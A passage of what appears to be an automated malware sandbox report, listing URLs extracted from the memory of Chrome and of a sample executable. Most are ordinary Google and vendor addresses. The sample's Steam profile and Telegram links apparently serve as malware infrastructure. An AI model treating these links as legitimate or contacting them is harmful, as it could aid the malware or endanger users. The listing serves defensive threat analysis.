Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/glic2
Source: chrome.exe, 00000008.00000003.1381842607.00001EC800468000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D60000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381776359.00001EC800458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381842607.00001EC800468000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381842607.00001EC800468000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1471835996.00001ECC02204000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000008.00000002.1474605622.00001ECC02AF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418662063.00001ECC03F64000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: vaim7g.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000008.00000002.1475589689.00001ECC02DC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1479007037.00001ECC039D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475944559.00001ECC02F60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000008.00000003.1394242037.00001ECC03814000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417797321.00001ECC02728000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/gen204
Source: chrome.exe, 00000008.00000002.1472800160.00001ECC02524000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000008.00000002.1475051363.00001ECC02BB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478092354.00001ECC03534000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477058236.00001ECC0334C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/:
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/J
Source: chrome.exe, 00000008.00000002.1476986237.00001ECC03310000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1479307186.00001ECC03AD0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477433388.00001ECC034A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000008.00000002.1479307186.00001ECC03AD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultfault
Source: chrome.exe, 00000008.00000002.1476986237.00001ECC03310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_defaultle
Source: chrome.exe, 00000008.00000002.1475051363.00001ECC02BB4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/es
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000008.00000002.1474848712.00001ECC02B34000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1473322628.00001ECC0261C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.1479087431.00001ECC03A04000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475944559.00001ECC02F60000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475351535.00001ECC02CBB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000008.00000002.1476576882.00001ECC0315C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000008.00000002.1475287933.00001ECC02C90000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476576882.00001ECC0315C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000008.00000003.1381861908.00001EC80048C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000008.00000002.1477095136.00001ECC03394000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475840951.00001ECC02ED8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp, chrome.exe, 00000008.00000002.1475718665.00001ECC02E50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394098825.00001ECC033F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000008.00000002.1477192434.00001ECC033E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000008.00000002.1479497325.00001ECC03BC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418621822.00001ECC03C58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417857151.00001ECC02774000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418547462.00001ECC03C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476691696.00001ECC03198000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475743528.00001ECC02E6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476691696.00001ECC03198000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000008.00000002.1478534851.00001ECC036B8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 00000008.00000002.1477818569.00001ECC034EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476733673.00001ECC031E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1477977869.00001ECC034F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000008.00000002.1478025452.00001ECC03510000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1481418958.00001ECC041C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478002075.00001ECC03504000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000008.00000003.1394242037.00001ECC03814000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1417797321.00001ECC02728000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394191951.00001ECC037DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://passwords.google.comSaved
Source: chrome.exe, 00000008.00000002.1474929281.00001ECC02B58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://people.googleapis.com/
Source: chromecache_71.9.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000008.00000002.1467250234.00000241C2FC7000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true(
Source: chromecache_69.9.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_69.9.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp, chrome.exe, 00000008.00000002.1475718665.00001ECC02E50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1394098825.00001ECC033F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000008.00000002.1473411751.00001ECC02658000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000002.1473411751.00001ECC02658000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000002.1472451164.00001ECC023DF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000008.00000002.1472158324.00001ECC02310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
Source: chrome.exe, 00000008.00000002.1472570377.00001ECC02418000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1476110867.00001ECC03004000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://seedtag.com
Source: chrome.exe, 00000008.00000003.1418774683.00001ECC03D08000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1381619552.00001EC800184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000008.00000002.1475589689.00001ECC02DC8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1479007037.00001ECC039D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.1475944559.00001ECC02F60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sitescout.com
Source: chrome.exe, 00000008.00000002.1473241743.00001ECC025E4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1418445222.00001ECC0385C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Cm2GRjWK1C.exe, 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676587237.0000000003001000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199829660832
Source: Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/96817
Source: chrome.exe, 00000008.00000002.1473665659.00001ECC027D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 00000008.00000002.1464391432.00000241BD430000.00000002.00000001.00040000.0000000F.sdmp	String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Cm2GRjWK1C.exe, 00000000.00000002.1681344018.00000000049F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20161
Source: chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: chrome.exe, 00000008.00000002.1478048628.00001ECC0351C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e175
Source: Cm2GRjWK1C.exe, 00000000.00000003.1676784292.0000000003022000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676587237.0000000003001000.00000004.00000020.00020000.00000000.sdmp, Cm2GRjWK1C.exe, 00000000.00000003.1676539519.0000000002D62000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/l793oy
Source: chrome.exe, 00000008.00000002.1476110867.00001ECC03004000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tailtarget.com
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tamedia.com.tw
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tangooserver.com
Source: chrome.exe, 00000008.00000002.1472490493.00001ECC023E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://test-app-api.dvdfab.cn/api/
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://test-user-profile.dvdfab.cn/api/user/info
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://trkkn.com
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tya-dev.com
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://user-profile.dvdfab.cn/api/user/info
Source: Cm2GRjWK1C.exe	String found in binary or memory: https://user-profile.dvdfab.cn/api/user/infohttps://test-user-profile.dvdfab.cn/api/user/infoGet
Source: chromecache_69.9.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chrome.exe, 00000008.00000002.1476142946.00001ECC0304A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://worldhistory.org
